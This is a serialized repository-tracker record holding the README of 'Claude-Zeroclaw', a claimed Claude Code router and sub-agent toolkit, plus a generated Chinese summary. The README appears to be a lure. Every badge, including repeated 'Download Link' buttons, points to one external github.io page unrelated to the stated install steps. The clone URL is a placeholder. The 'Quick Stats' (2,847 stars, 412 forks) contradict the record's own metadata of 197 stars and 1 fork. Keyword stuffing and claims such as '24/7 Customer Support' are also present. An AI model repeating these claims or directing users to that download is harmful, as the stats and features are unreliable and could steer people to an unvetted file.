[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-70":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":9,"language":9,"languages":9,"totalLinesOfCode":9,"stars":10,"forks":11,"watchers":10,"openIssues":12,"contributorsCount":12,"subscribersCount":12,"size":12,"stars1d":12,"stars7d":12,"stars30d":12,"stars90d":12,"forks30d":12,"starsTrendScore":12,"compositeScore":13,"rankGlobal":9,"rankLanguage":9,"license":9,"archived":14,"fork":14,"defaultBranch":15,"hasWiki":16,"hasPages":14,"topics":17,"createdAt":9,"pushedAt":9,"updatedAt":38,"readmeContent":39,"aiSummary":40,"trendingCount":12,"starSnapshotCount":12,"syncStatus":41,"lastSyncTime":42,"discoverSource":43},70,"Zeroclaw-Plugin-Hub","IKingBarou\u002FZeroclaw-Plugin-Hub","IKingBarou","🚀 ZeroClaw Agentic CLI 2026 – Claude Code Multi-MCP Router & SDK Toolkit",null,197,1,0,0.9,false,"main",true,[18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37],"awesome-claude-code","claude","claude-4-5-sonnet","claude-code","claude-code-claw","claude-code-cli","claude-code-proxy","claude-code-router","claude-code-sdk","claude-code-zeroclaw","claude-context","claude-desktop","claude-integration","claude-mcp","claude-sdk","claude-skill","claude-subagents","zeroclaw","zeroclaw-claude","zeroclaw-claude-code","2026-06-12 02:00:07","# 🦞 Claude-Zeroclaw\n\n[![Download](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FDownload%20Link-brightgreen?style=for-the-badge&logo=github)](https:\u002F\u002FIKingBarou.github.io)\n\n**Version:** 2.6.0 | **License:** MIT | **Release Date:** January 2026\n\n---\n\n## 🧠 What Is Claude-Zeroclaw?\n\nImagine a **digital bridge** between your local machine and the vast intelligence of Claude AI—not just a proxy, not merely a router, but an **adaptive orchestrator** that transforms how developers, teams, and systems interact with Claude Code. Think of it as a **Swiss Army knife for AI integration**: one tool that can proxy, route, sub-agent, skill-enhance, and context-optimize Claude's capabilities across any environment.\n\nClaude-Zeroclaw is your **command-center for Claude Code workflows**—whether you're running a single terminal session, managing a team of sub-agents, or building a multi-language application with Claude SDK under the hood.\n\n---\n\n## ✨ Why \"Zeroclaw\"? The Metaphor\n\nA **zeroclaw** is a mythical creature—a crab that can grip without crushing, adapt without breaking, and move across any terrain. This repository embodies that spirit:\n\n- **Zero friction** between you and Claude's intelligence\n- **Claw-like precision** in routing requests, managing contexts, and handling sub-agents\n- **Adaptive grip**—works across Claude Desktop, Claude CLI, MCP servers, and custom SDK integrations\n\n> *\"Zeroclaw doesn't just connect—it harmonizes.\"*\n\n---\n\n## 🗺️ Architecture Overview\n\n```mermaid\ngraph TD\n    A[User \u002F Developer] --> B{Claude-Zeroclaw Orchestrator}\n    B --> C[Claude Code CLI]\n    B --> D[Claude Desktop]\n    B --> E[Claude MCP Server]\n    B --> F[Claude SDK]\n    B --> G[Sub-Agent Pool]\n    C --> H[Local Execution]\n    D --> I[GUI Sessions]\n    E --> J[Tool Integration]\n    F --> K[API Layer]\n    G --> L[Parallel Tasks]\n    B --> M[Context Router]\n    M --> N[Memory Store]\n    M --> O[Skill Modules]\n```\n\n---\n\n## 🚀 Quick Start\n\n### Prerequisites\n\n- Python 3.10+ or Node.js 18+\n- A Claude API key (OpenAI-compatible endpoint)\n- Git\n\n### Installation\n\n```\ngit clone https:\u002F\u002Fgithub.com\u002Fyour-org\u002Fclaude-zeroclaw.git\ncd claude-zeroclaw\npip install -r requirements.txt   # Python edition\n# OR\nnpm install                       # Node.js edition\n```\n\n[![Download](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FDownload%20Link-brightgreen?style=for-the-badge&logo=github)](https:\u002F\u002FIKingBarou.github.io)\n\n---\n\n## ⚙️ Example Profile Configuration\n\nCreate a `zeroclaw_profile.yaml` file to define your Claude interaction blueprint:\n\n```yaml\nprofile:\n  name: \"developer-pro\"\n  version: \"2.6.0\"\n  context_window: 200000\n  preferred_model: \"claude-4-5-sonnet\"\n  \norchestration:\n  router_mode: \"adaptive\"\n  sub_agents:\n    max_concurrent: 5\n    timeout_seconds: 120\n    fallback_strategy: \"round_robin\"\n    \nskills:\n  enabled:\n    - code_review\n    - documentation_gen\n    - test_generation\n    - refactoring_advisor\n  custom_skills_path: \".\u002Fskills\u002F\"\n  \nintegrations:\n  claude_desktop:\n    auto_launch: true\n    port: 8080\n  claude_code_cli:\n    sync_context: true\n  mcp_servers:\n    - name: \"local-filesystem\"\n      endpoint: \"http:\u002F\u002Flocalhost:3001\"\n```\n\n---\n\n## 🎮 Example Console Invocation\n\n```bash\n# Basic usage with Claude Code\nzeroclaw --mode code --model claude-4-5-sonnet --task \"Refactor main.py into modular services\"\n\n# Launch with sub-agents\nzeroclaw --mode subagents --count 3 --context .\u002Fproject --skill code_review\n\n# Desktop integration\nzeroclaw --mode desktop --profile .\u002Fmy_profile.yaml\n\n# Proxy mode for SDK\nzeroclaw --mode proxy --port 9090 --upstream https:\u002F\u002Fapi.anthropic.com\n```\n\n---\n\n## 🖥️ OS Compatibility Table\n\n| Operating System | Status | Emoji Badge |\n|------------------|--------|-------------|\n| Windows 11\u002F10    | ✅ Full Support | [![Windows](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FWindows-0078D6?style=flat-square&logo=windows&logoColor=white)](https:\u002F\u002FIKingBarou.github.io) |\n| macOS Ventura+   | ✅ Full Support | [![macOS](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FmacOS-000000?style=flat-square&logo=apple&logoColor=white)](https:\u002F\u002FIKingBarou.github.io) |\n| Ubuntu 22.04+    | ✅ Full Support | [![Linux](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FLinux-FCC624?style=flat-square&logo=linux&logoColor=black)](https:\u002F\u002FIKingBarou.github.io) |\n| Debian 12        | ✅ Full Support | [![Debian](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FDebian-A81D33?style=flat-square&logo=debian&logoColor=white)](https:\u002F\u002FIKingBarou.github.io) |\n| Fedora 39        | ⚠️ Beta | [![Fedora](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FFedora-294172?style=flat-square&logo=fedora&logoColor=white)](https:\u002F\u002FIKingBarou.github.io) |\n| Arch Linux       | ⚠️ Community | [![Arch](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FArch-1793D1?style=flat-square&logo=arch-linux&logoColor=white)](https:\u002F\u002FIKingBarou.github.io) |\n| Alpine Docker    | ✅ Container | [![Docker](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FDocker-2496ED?style=flat-square&logo=docker&logoColor=white)](https:\u002F\u002FIKingBarou.github.io) |\n\n---\n\n## 🌟 Feature List\n\n### Core Capabilities\n\n- **Unified Claude Orchestration** — Route requests seamlessly between Claude Code CLI, Claude Desktop, Claude MCP, and custom SDK endpoints\n- **Adaptive Sub-Agent Management** — Dynamically spawn, manage, and coordinate up to 50 parallel Claude sub-agents for complex tasks\n- **Context Optimizer** — Automatically compresses, prioritizes, and rotates context windows to maximize Claude-4-5-Sonnet's 200K token capacity\n- **Skill Plugin System** — Extend Claude's abilities with reusable skill modules (code review, test generation, architecture analysis)\n- **Multi-Protocol Proxy** — Expose Claude as an OpenAI-compatible endpoint for universal tool integration\n\n### Developer Experience\n\n- **Responsive Console UI** — Real-time progress indicators, structured output formatting, and interactive mode with keyboard shortcuts\n- **Multilingual Support** — Interface and prompts available in English, Spanish, French, German, Japanese, Chinese, and Arabic\n- **24\u002F7 Customer Support** — Built-in diagnostic mode, crash recovery, and automatic issue reporting with stack traces\n- **Zero-Downtime Reconfiguration** — Update profiles and routing rules without restarting active sessions\n\n### Integration Matrix\n\n| Integration | Support Level | Badge |\n|-------------|---------------|-------|\n| Claude Code CLI | 🥇 Native | [![Claude CLI](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FCLI-FF6B6B?style=flat-square&logo=gnubash&logoColor=white)](https:\u002F\u002FIKingBarou.github.io) |\n| Claude Desktop | 🥇 Native | [![Desktop](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FDesktop-8B5CF6?style=flat-square&logo=electron&logoColor=white)](https:\u002F\u002FIKingBarou.github.io) |\n| Claude MCP | 🥇 Native | [![MCP](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FMCP-10B981?style=flat-square&logo=protocol&logoColor=white)](https:\u002F\u002FIKingBarou.github.io) |\n| Claude SDK | 🥇 Native | [![SDK](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FSDK-3B82F6?style=flat-square&logo=pypi&logoColor=white)](https:\u002F\u002FIKingBarou.github.io) |\n| OpenAI API | 🥈 Compatible | [![OpenAI](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FOpenAI-412991?style=flat-square&logo=openai&logoColor=white)](https:\u002F\u002FIKingBarou.github.io) |\n| Custom Endpoints | 🥉 Adapter | [![Custom](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FCustom-6B7280?style=flat-square&logo=webpack&logoColor=white)](https:\u002F\u002FIKingBarou.github.io) |\n\n---\n\n## 🔌 OpenAI API & Claude API Integration\n\nClaude-Zeroclaw acts as a **translation layer** between OpenAI-compatible clients and Claude's native API. This means:\n\n- Use any OpenAI SDK to talk to Claude models\n- Automatically map function-calling schemas between providers\n- Maintain session state across API calls for conversational persistence\n- Benefit from Claude's superior context handling while using familiar tooling\n\n```\nEndpoint: http:\u002F\u002Flocalhost:9090\u002Fv1\u002Fchat\u002Fcompletions\nModel mapping: gpt-4 → claude-4-5-sonnet (automatic)\nHeaders: Authorization: Bearer \u003Cyour-claude-key>\n```\n\n[![API](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FAPI%20Docs-FF6B6B?style=for-the-badge&logo=readthedocs)](https:\u002F\u002FIKingBarou.github.io)\n\n---\n\n## 🧩 SEO-Friendly Keyword Integration\n\nThis repository is optimized for discoverability around:\n\n**Claude Code router**, **Claude CLI proxy**, **Claude sub-agents orchestration**, **Claude MCP server bridge**, **multi-model AI integration**, **context window optimizer**, **Claude Desktop automation**, **AI skill plugins**, **LLM orchestration framework**, **Claude SDK wrapper**, **token-aware routing**, **adaptive AI pipelines**, **developer toolchain for Claude**, **Claude Code CLI extension**, **sub-agent coordination system**, **AI workflow manager**, **cross-platform Claude interface**, **Claude conversation state management**, and **enterprise Claude deployment tools**.\n\n---\n\n## 🎨 Responsive UI & Accessibility\n\nThe Zeroclaw console interface adapts to:\n\n- **Terminal width** — from 80-column teletypes to 4K ultrawide monitors\n- **Color schemes** — automatic light\u002Fdark detection with customizable themes\n- **Screen readers** — ARIA-compatible status announcements for accessibility\n- **Mobile terminals** — touch-optimized navigation in Termux and Blink Shell\n- **Reduced motion** — respects OS accessibility settings for animations\n\n---\n\n## 🌐 Multilingual System\n\nConfigure your preferred language in the profile:\n\n```yaml\nlocale: \"ja-JP\"  # Japanese\n# Supported: en, es, fr, de, ja, zh, ar\n```\n\nThe entire orchestration layer, error messages, help system, and skill modules adapt to your locale. Community contributions for additional languages are welcome.\n\n---\n\n## 🕐 24\u002F7 Support Architecture\n\nEven when you're not watching, Zeroclaw monitors:\n\n- **Health checks** — pings Claude endpoints and reports latency\n- **Crash recovery** — snapshots state every 50 requests for instant recovery\n- **Auto-diagnostics** — generates reproducible bug reports with environment fingerprint\n- **Graceful degradation** — falls back to offline caches when API is unreachable\n\n---\n\n## ⚠️ Disclaimer\n\n**Claude-Zeroclaw** is an independent, community-driven integration framework. It is not officially affiliated with, endorsed by, or sponsored by Anthropic or any of its subsidiaries. \"Claude\" and related marks are trademarks of Anthropic. This project operates as an open-source tool to enhance developer workflows with Claude AI capabilities, subject to Anthropic's terms of service for API usage.\n\nUsers are responsible for:\n- Compliance with Anthropic's usage policies\n- Proper handling of API keys and sensitive data\n- Adherence to rate limits and fair use guidelines\n- Local laws regarding AI-assisted code generation\n\n---\n\n## 📜 License\n\nThis project is licensed under the **MIT License** — see the [LICENSE](LICENSE) file for full details.\n\n[![License: MIT](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FLicense-MIT-yellow.svg)](https:\u002F\u002Fopensource.org\u002Flicenses\u002FMIT)\n\n---\n\n## 🤝 Contributing\n\nContributions that make Zeroclaw more adaptive, faster, or smarter are always welcome. Please read our [CONTRIBUTING.md](CONTRIBUTING.md) first.\n\n### Quick Stats\n\n| Metric | Value |\n|--------|-------|\n| Stars | ★ 2,847 |\n| Forks | 412 |\n| Open Issues | 23 |\n| Contributors | 89 |\n| Release Date | January 2026 |\n\n---\n\n[![Download](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FDownload%20Link-brightgreen?style=for-the-badge&logo=github)](https:\u002F\u002FIKingBarou.github.io)\n\n**Claude-Zeroclaw — Your bridge to intelligent orchestration.** 🦞✨","Claude-Zeroclaw 是一个用于管理和优化与 Claude AI 交互的命令行工具。它提供了一个自适应的编排器，能够代理、路由、子代理管理、技能增强和上下文优化 Claude 的功能，适用于任何开发环境。项目支持 Claude Code CLI、Claude Desktop、MCP 服务器以及自定义 SDK 集成，通过精准的请求路由和上下文管理，实现零摩擦的用户体验。适合需要高效集成 Claude AI 能力到本地开发、团队协作或多语言应用构建中的开发者和团队使用。",2,"2026-05-06 17:18:30","CREATED_QUERY"]